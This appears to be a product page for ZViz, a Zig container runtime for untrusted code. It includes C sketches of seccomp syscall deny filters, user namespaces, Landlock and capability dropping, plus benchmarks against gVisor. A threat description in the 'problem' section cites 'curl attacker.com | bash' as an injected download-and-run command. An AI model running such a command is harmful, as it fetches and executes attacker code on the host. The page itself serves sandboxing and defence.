zviz zig build · run
OCI runtime · Zig · Linux 5.13+

Container isolation for code you can't trust but have to run.

ZViz is an OCI-compatible container runtime written in Zig that takes a selective-denial approach. 132 syscalls reach the host kernel at native speed. 24 dangerous ones are rejected by the seccomp filter at syscall entry, before their kernel implementations run. One more, socket, is filtered inline on its arguments. No userspace kernel. No daemon.
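ZViz itself is written in Zig, but the kernel's C headers are the clearest way to show the general shape of a selective-denial filter. The sketch below is an illustration only and is not ZViz's 124-instruction filter. It checks the architecture and loads the syscall number. It then returns EPERM for a hypothetical three-entry deny list (ptrace, mount and init_module, the denials shown in the sample log). It denies socket(AF_PACKET, ...) by inspecting the first argument and allows everything else. All names are hypothetical.

```c
#include <errno.h>
#include <stddef.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>

#if defined(__x86_64__)
#define SKETCH_ARCH AUDIT_ARCH_X86_64
#elif defined(__aarch64__)
#define SKETCH_ARCH AUDIT_ARCH_AARCH64
#else
#error "this sketch only covers x86_64 and aarch64"
#endif

#define LOAD(field) BPF_STMT(BPF_LD | BPF_W | BPF_ABS, offsetof(struct seccomp_data, field))
#define RET(action) BPF_STMT(BPF_RET | BPF_K, (action))
#define DENY_EPERM  (SECCOMP_RET_ERRNO | (EPERM & SECCOMP_RET_DATA))
/* If the syscall number equals nr, fall through to RET EPERM; otherwise skip it. */
#define DENY(nr)    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, (nr), 0, 1), RET(DENY_EPERM)

struct sock_filter sketch_filter[] = {
    LOAD(arch),                                             /* [0] */
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, SKETCH_ARCH, 1, 0), /* [1] */
    RET(SECCOMP_RET_KILL_PROCESS),                          /* [2] foreign ABI */
    LOAD(nr),                                               /* [3] */
    /* [4-5] Kill x32-ABI numbers (bit 30) on x86_64; a harmless bound check elsewhere. */
    BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, 0x40000000, 0, 1),
    RET(SECCOMP_RET_KILL_PROCESS),
    DENY(__NR_ptrace),                                      /* [6-7] */
    DENY(__NR_mount),                                       /* [8-9] */
    DENY(__NR_init_module),                                 /* [10-11] */
    /* [12] Not socket? Jump 3 ahead to the final ALLOW. */
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_socket, 0, 3),
    LOAD(args[0]),                                          /* [13] low 32 bits of domain (little-endian) */
    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AF_PACKET, 0, 1),   /* [14] */
    RET(DENY_EPERM),                                        /* [15] socket(AF_PACKET, ...) */
    RET(SECCOMP_RET_ALLOW),                                 /* [16] everything else runs natively */
};

/* Load the filter into the calling thread; it is inherited across fork and execve. */
int install_sketch_filter(void)
{
    struct sock_fprog prog = {
        .len = (unsigned short)(sizeof sketch_filter / sizeof sketch_filter[0]),
        .filter = sketch_filter,
    };
    /* Without CAP_SYS_ADMIN, the kernel requires no_new_privs before accepting a filter. */
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0)
        return -1;
    return prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog, 0, 0);
}
```

A runtime would typically call something like install_sketch_filter() in the container's init process just before execve. The default-allow ending is what lets unlisted syscalls run at native speed.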

19/19 escape tests blocked · 41/41 capabilities dropped · ~8 ms cold start · ~2 MB per container
~/zviz-bundle
$ zviz run hostile-tenant ~/bundle --verbose
[init] namespaces ............. user pid mount ipc uts
[init] capabilities ........... 41 dropped
[init] landlock ............... ruleset applied
[init] seccomp ................ 124-instr BPF loaded
[init] cgroups v2 ............. mem=512M pids=64
[ready] PID 1 in 7.8ms

[syscall] read(0, ...)                ALLOW
[syscall] write(1, ...)               ALLOW
[syscall] clock_gettime(...)          ALLOW
[syscall] socket(AF_PACKET, ...)      DENY  EPERM
[syscall] ptrace(...)                 DENY  EPERM
[syscall] mount(...)                  DENY  EPERM
[syscall] init_module(...)            DENY  EPERM
[broker]  socket(AF_INET, SOCK_STREAM, 0) inspected ok

Output shape based on README's --verbose behavior; not a recorded session.

The problem

You're running code you didn't write.

Containers that rely on namespaces and cgroups alone leave the host kernel's full syscall attack surface reachable. Every runc escape CVE is a reminder that "containerized" isn't a security strategy.

AI agents executing LLM-generated code

One prompt injection away from curl attacker.com | bash. Selective denial means the exploit fails at step 1.

CI pipelines on opaque dep trees

npm install on 47 transitive deps you have not audited. Drop caps, deny network, keep the build.

Third-party plugins that "need shell access"

Landlock restricts filesystem access. Capabilities are cleared. The plugin runs as PID 1 in a fresh user namespace.

Multi-tenant workloads next to each other

Fresh user + pid + mount + ipc + uts namespaces per container. The kernel boundary is the actual boundary.
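The following minimal C sketch creates the five namespaces listed above with unshare(2) and maps the caller's host ids to root inside the new user namespace. The helper names (SKETCH_NS_FLAGS, format_id_map, enter_namespaces) are hypothetical, and ZViz may well use clone(2) instead. The setgroups, uid_map and gid_map sequence is the standard one for unprivileged user namespaces.

```c
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <sys/types.h>

/* The five namespaces listed above; no CLONE_NEWNET because the page doesn't list one. */
#define SKETCH_NS_FLAGS (CLONE_NEWUSER | CLONE_NEWPID | CLONE_NEWNS | CLONE_NEWIPC | CLONE_NEWUTS)

/* Format a uid_map/gid_map line mapping container id 0 to one host id. Returns length or -1. */
int format_id_map(char *buf, size_t len, unsigned host_id)
{
    int n = snprintf(buf, len, "0 %u 1\n", host_id);
    return (n < 0 || (size_t)n >= len) ? -1 : n;
}

static int write_file(const char *path, const char *data)
{
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    int ok = fputs(data, f) >= 0;
    /* Map files must be written in a single write(2); fclose flushes this short buffer at once. */
    if (fclose(f) != 0)
        ok = 0;
    return ok ? 0 : -1;
}

/* Unshare all five namespaces and map the caller's ids to root in the new user namespace.
   The caller stays in its old PID namespace; its next fork()ed child becomes PID 1. */
int enter_namespaces(uid_t host_uid, gid_t host_gid)
{
    char map[64];
    if (unshare(SKETCH_NS_FLAGS) != 0)
        return -1;
    /* Unprivileged writers must deny setgroups before gid_map is accepted. */
    if (write_file("/proc/self/setgroups", "deny") != 0)
        return -1;
    if (format_id_map(map, sizeof map, host_uid) < 0 || write_file("/proc/self/uid_map", map) != 0)
        return -1;
    if (format_id_map(map, sizeof map, host_gid) < 0 || write_file("/proc/self/gid_map", map) != 0)
        return -1;
    return 0;
}
```

Capture getuid() and getgid() before calling enter_namespaces(). Inside the new user namespace, both read as the overflow id until the maps are written.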

Architecture

Five enforcement layers, applied in order.

Ordering is load-bearing. Capabilities are dropped before seccomp loads. Landlock is applied before seccomp so the filter cannot block Landlock's own setup syscalls.
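Dropping capabilities uses only prctl(2) and capset(2). Doing it before the seccomp filter loads therefore means the filter never has to allow those calls. The following C sketch of that step assumes Linux 5.9 or later. On those kernels, CAP_CHECKPOINT_RESTORE (40) is the highest capability, for 41 in total. The function names are hypothetical.

```c
#include <linux/capability.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <unistd.h>

/* CAP_CHECKPOINT_RESTORE (40) is the highest capability as of Linux 5.9: 41 in total. */
#define SKETCH_LAST_CAP 40

/* Clear the bounding, ambient, effective, permitted and inheritable sets.
   The bounding-set drops need CAP_SETPCAP, e.g. as root inside a fresh user namespace. */
int drop_all_capabilities(void)
{
    for (int cap = 0; cap <= SKETCH_LAST_CAP; cap++)
        if (prctl(PR_CAPBSET_DROP, cap, 0, 0, 0) != 0)
            return -1; /* EINVAL here usually means a kernel older than 5.9 */
    if (prctl(PR_CAP_AMBIENT, PR_CAP_AMBIENT_CLEAR_ALL, 0, 0, 0) != 0)
        return -1;
    /* Capability ABI v3 splits the capability bits across two 32-bit words; zero both. */
    struct __user_cap_header_struct hdr = { .version = _LINUX_CAPABILITY_VERSION_3, .pid = 0 };
    struct __user_cap_data_struct data[2] = { { 0, 0, 0 }, { 0, 0, 0 } };
    return (int)syscall(SYS_capset, &hdr, data);
}

/* Count capabilities still present in the bounding set (0 after a successful drop). */
int bounding_caps_remaining(void)
{
    int n = 0;
    for (int cap = 0; cap <= SKETCH_LAST_CAP; cap++)
        if (prctl(PR_CAPBSET_READ, cap, 0, 0, 0) == 1)
            n++;
    return n;
}
```

After drop_all_capabilities() returns 0, bounding_caps_remaining() should report 0.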

01 Namespaces: user, pid, mount, ipc, uts (resource isolation)

02 Capabilities: all 41 Linux capabilities dropped, so no CAP_SYS_*

03 Landlock LSM: unprivileged filesystem access control

04 Seccomp-BPF: 124-instruction filter with ALLOW / DENY / BROKER outcomes

05 cgroups v2: memory, PID and CPU limits; fork bombs contained
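Of the five layers, Landlock is probably the least familiar. The following minimal C sketch assumes the Landlock ABI v1 rights from Linux 5.13 and uses a hypothetical helper name. It handles all 13 v1 filesystem rights, so each one is denied unless a rule grants it. It then grants only read and execute access beneath one directory.

```c
#define _GNU_SOURCE /* for O_PATH */
#include <errno.h>
#include <fcntl.h>
#include <linux/landlock.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Every filesystem right in Landlock ABI v1 (Linux 5.13). A handled right is
   denied everywhere unless some rule grants it. */
#define FS_ALL_V1 (LANDLOCK_ACCESS_FS_EXECUTE | LANDLOCK_ACCESS_FS_WRITE_FILE | \
                   LANDLOCK_ACCESS_FS_READ_FILE | LANDLOCK_ACCESS_FS_READ_DIR | \
                   LANDLOCK_ACCESS_FS_REMOVE_DIR | LANDLOCK_ACCESS_FS_REMOVE_FILE | \
                   LANDLOCK_ACCESS_FS_MAKE_CHAR | LANDLOCK_ACCESS_FS_MAKE_DIR | \
                   LANDLOCK_ACCESS_FS_MAKE_REG | LANDLOCK_ACCESS_FS_MAKE_SOCK | \
                   LANDLOCK_ACCESS_FS_MAKE_FIFO | LANDLOCK_ACCESS_FS_MAKE_BLOCK | \
                   LANDLOCK_ACCESS_FS_MAKE_SYM)
#define FS_READ_ONLY (LANDLOCK_ACCESS_FS_EXECUTE | LANDLOCK_ACCESS_FS_READ_FILE | \
                      LANDLOCK_ACCESS_FS_READ_DIR)

/* Confine the calling thread and its future children to read/execute access
   beneath `dir`. Returns 0 on success, -1 with errno set on failure. */
int landlock_read_only(const char *dir)
{
    struct landlock_ruleset_attr attr = { .handled_access_fs = FS_ALL_V1 };
    struct landlock_path_beneath_attr rule = { .allowed_access = FS_READ_ONLY, .parent_fd = -1 };
    int ruleset = (int)syscall(__NR_landlock_create_ruleset, &attr, sizeof attr, 0);
    if (ruleset < 0)
        return -1; /* ENOSYS or EOPNOTSUPP: Landlock unavailable */

    rule.parent_fd = open(dir, O_PATH | O_CLOEXEC);
    /* Add the rule, set no_new_privs (required when unprivileged), then enforce. */
    int rc = (rule.parent_fd < 0
              || syscall(__NR_landlock_add_rule, ruleset, LANDLOCK_RULE_PATH_BENEATH, &rule, 0) != 0
              || prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != 0
              || syscall(__NR_landlock_restrict_self, ruleset, 0) != 0) ? -1 : 0;

    int saved = errno;
    if (rule.parent_fd >= 0)
        close(rule.parent_fd);
    close(ruleset);
    errno = saved;
    return rc;
}
```

A real ruleset needs more than one rule, for example writable scratch space. It should also query the ABI version before handling rights added later, such as LANDLOCK_ACCESS_FS_REFER in ABI v2.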

runc: App → Kernel (all syscalls available). Namespaces + cgroups only.

gVisor: App → Sentry userspace kernel (emulates ~300 syscalls) → Host kernel (Sentry itself uses ~70).

ZViz: App → BPF filter → ALLOW (132, native) / DENY (24) / BROKER (mediated).

Measured

The performance tax goes away when you stop emulating.

Allowed syscalls hit the host kernel directly. gVisor routes everything through its Sentry process. The clock_gettime gap is extreme because Sentry can't use the kernel vDSO.

Numbers come from the ZViz repo's demo.sh --perf, using the same OCI bundle and the same statically linked benchmark for both runtimes.

Syscall        ZViz       gVisor     Speedup
clock_gettime  20 ns      4,982 ns   249x
read           212 ns     4,393 ns   20.7x
write          211 ns     1,169 ns   5.5x
getuid         202 ns     1,125 ns   5.6x
getpid         297 ns     1,209 ns   4.1x
open_close     2,895 ns   4,403 ns   1.5x
stat           1,767 ns   2,364 ns   1.3x
Cold start: ~8 ms (vs ~200 ms for gVisor)
Memory: ~2 MB per container (vs ~50 MB for Sentry)
Policy match: 98.2% (54/55 vs gVisor)
Built-in profiles

Pick a profile, not a policy file.

Five named profiles cover the common shapes. Choose the closest, then narrow further if you need to.

--profile=ci-runner

CI / build systems

Default profile. Balanced security for general-purpose CI workloads.

--profile=web-server

HTTP APIs, services

Network allowed. Socket ops optimised for high-throughput request paths.

--profile=batch-job

Data processing, ETL

No network. Memory cap 8G. For pipelines that should not phone home.

--profile=hostile-tenant

Untrusted user code

Maximum restrictions. The right starting point for agent execution.

--profile=development

Debugging only

Allows ptrace. NOT for production. Useful for tracing why your prod profile is blocking something.
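Profile limits, such as batch-job's 8G memory cap or the mem=512M pids=64 line in the sample log, end up as values in cgroup v2 control files. The following minimal C sketch uses hypothetical helpers. It assumes binary units and that the container's cgroup directory already exists. The kernel's memory.max also accepts K/M/G suffixes directly, so parsing in userspace mainly serves validation.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Parse "64", "512M", "8G" (binary K/M/G suffixes) into bytes. Returns 0 on malformed input. */
uint64_t parse_size(const char *s)
{
    char *end;
    unsigned shift = 0;
    if (*s < '0' || *s > '9')
        return 0; /* rejects "", "-1", " 8G" */
    errno = 0;
    unsigned long long v = strtoull(s, &end, 10);
    if (errno != 0)
        return 0;
    switch (*end) {
    case '\0': break;
    case 'K': case 'k': shift = 10; end++; break;
    case 'M': case 'm': shift = 20; end++; break;
    case 'G': case 'g': shift = 30; end++; break;
    default: return 0;
    }
    if (*end != '\0' || v > (UINT64_MAX >> shift))
        return 0;
    return (uint64_t)v << shift;
}

/* Write one value into a cgroup v2 control file such as memory.max or pids.max. */
int cgroup_write(const char *cgroup_dir, const char *file, uint64_t value)
{
    char path[4096];
    int n = snprintf(path, sizeof path, "%s/%s", cgroup_dir, file);
    if (n < 0 || (size_t)n >= sizeof path)
        return -1;
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    int ok = fprintf(f, "%llu\n", (unsigned long long)value) > 0;
    return (fclose(f) == 0 && ok) ? 0 : -1;
}
```

cgroup_write(dir, "memory.max", parse_size("512M")) and cgroup_write(dir, "pids.max", 64) would express the sample log's limits. Here dir is whatever cgroup the runtime created for the container. Check for a 0 return from parse_size before writing it.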

Honest trade-offs

When you should use gVisor instead.

ZViz blocks dangerous syscalls outright. gVisor emulates them in a sandboxed userspace kernel. Both achieve isolation. The approach matters for compatibility.

If your workload needs…                  Use     Why
ptrace (strace, debuggers)               gVisor  ZViz blocks it outside the development profile. gVisor emulates it safely.
mount / unshare (Docker-in-Docker)       gVisor  Nested containers need namespace syscalls.
Bazel / Nix builds                       gVisor  Their internal sandboxing creates namespaces.
Maximum syscall throughput               ZViz    Native speed vs 1.3–249x emulation overhead in the benchmarks above.
Sub-10ms cold starts                     ZViz    ~8 ms vs ~200 ms.
Strictest policy (block, don't emulate)  ZViz    Exploit code fails immediately.

Simple rule: nested containers or process tracing → gVisor. Otherwise ZViz is faster and stricter.

Quick start

Build it, point it at an OCI bundle.

Linux 5.13+ for Landlock. cgroups v2. Zig 0.15.0+ to build from source. Any OCI rootfs works — including ones produced by docker export.

On Ubuntu 24.04+, install the bundled AppArmor profile so that pivot_root still works when apparmor_restrict_unprivileged_userns=1. Without it, ZViz falls back to chdir-only filesystem isolation.
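The kernel requirements in the two paragraphs above can be probed before running anything. The following C sketch uses hypothetical helper names and is not a ZViz subcommand. It checks for a cgroup v2 mount at /sys/fs/cgroup, asks the kernel for its Landlock ABI version, and reads Ubuntu's apparmor_restrict_unprivileged_userns sysctl.

```c
#include <linux/landlock.h>
#include <linux/magic.h>
#include <stdio.h>
#include <sys/statfs.h>
#include <sys/syscall.h>
#include <unistd.h>

/* 1 if /sys/fs/cgroup is the unified cgroup v2 hierarchy, else 0. */
int have_cgroup2(void)
{
    struct statfs sfs;
    return statfs("/sys/fs/cgroup", &sfs) == 0 && sfs.f_type == CGROUP2_SUPER_MAGIC;
}

/* Landlock ABI version (1 on Linux 5.13), or -1 if Landlock is missing or disabled. */
int landlock_abi(void)
{
    long v = syscall(__NR_landlock_create_ruleset, NULL, 0, LANDLOCK_CREATE_RULESET_VERSION);
    return v >= 1 ? (int)v : -1;
}

/* 1 or 0 from Ubuntu's apparmor_restrict_unprivileged_userns sysctl; -1 if it is absent. */
int apparmor_userns_restricted(void)
{
    int v = -1;
    FILE *f = fopen("/proc/sys/kernel/apparmor_restrict_unprivileged_userns", "r");
    if (f != NULL) {
        if (fscanf(f, "%d", &v) != 1)
            v = -1;
        fclose(f);
    }
    return v;
}
```

A result of 1 from apparmor_userns_restricted() is the case where the bundled AppArmor profile matters.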

$ git clone https://github.com/Skelf-Research/zviz.git
$ cd zviz && zig build -Doptimize=ReleaseSafe

# Ubuntu 24.04+: load the AppArmor profile
$ sudo install -m 0644 packaging/apparmor/zviz /etc/apparmor.d/zviz
$ sudo apparmor_parser -r /etc/apparmor.d/zviz

# Grab any image as an OCI rootfs
$ mkdir -p ~/zviz-bundle/rootfs
$ docker create --name extract redis:alpine
$ docker export extract | tar -C ~/zviz-bundle/rootfs -xf -
$ docker rm extract

# Write a minimal config.json, then:
$ ./zig-out/bin/zviz run my-container ~/zviz-bundle
[ready] PID 1 in 7.8ms

ZViz auto-mounts /proc (nosuid+nodev+noexec), /sys (read-only), and a private /dev tmpfs. You don't need mounts[] entries for those.
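The three automatic mounts can be pictured as a small table applied under the container's rootfs. In this C sketch, the /proc and /sys flags follow the sentence above. The /dev options, the helper names and mounting under the host-side rootfs path are all assumptions. Two kernel rules constrain where such code can run. First, a fresh proc mount must be made from inside the new PID namespace. Second, a fresh sysfs mount generally requires owning a network namespace, so a runtime without one may need a read-only bind mount of /sys instead.

```c
#include <stdio.h>
#include <sys/mount.h>

struct auto_mount {
    const char *source, *target, *fstype;
    unsigned long flags;
    const char *data;
};

/* /proc and /sys flags follow the text; the /dev tmpfs options are assumptions. */
const struct auto_mount auto_mounts[] = {
    { "proc",  "proc", "proc",  MS_NOSUID | MS_NODEV | MS_NOEXEC, NULL },
    { "sysfs", "sys",  "sysfs", MS_RDONLY, NULL },
    { "tmpfs", "dev",  "tmpfs", MS_NOSUID, "mode=755" },
};

/* Mount each entry beneath `rootfs`, stopping at the first failure. */
int apply_auto_mounts(const char *rootfs)
{
    char target[4096];
    for (size_t i = 0; i < sizeof auto_mounts / sizeof auto_mounts[0]; i++) {
        const struct auto_mount *m = &auto_mounts[i];
        int n = snprintf(target, sizeof target, "%s/%s", rootfs, m->target);
        if (n < 0 || (size_t)n >= sizeof target)
            return -1;
        if (mount(m->source, target, m->fstype, m->flags, m->data) != 0)
            return -1;
    }
    return 0;
}
```

The /dev entry deliberately omits MS_NODEV, since device nodes still have to work there.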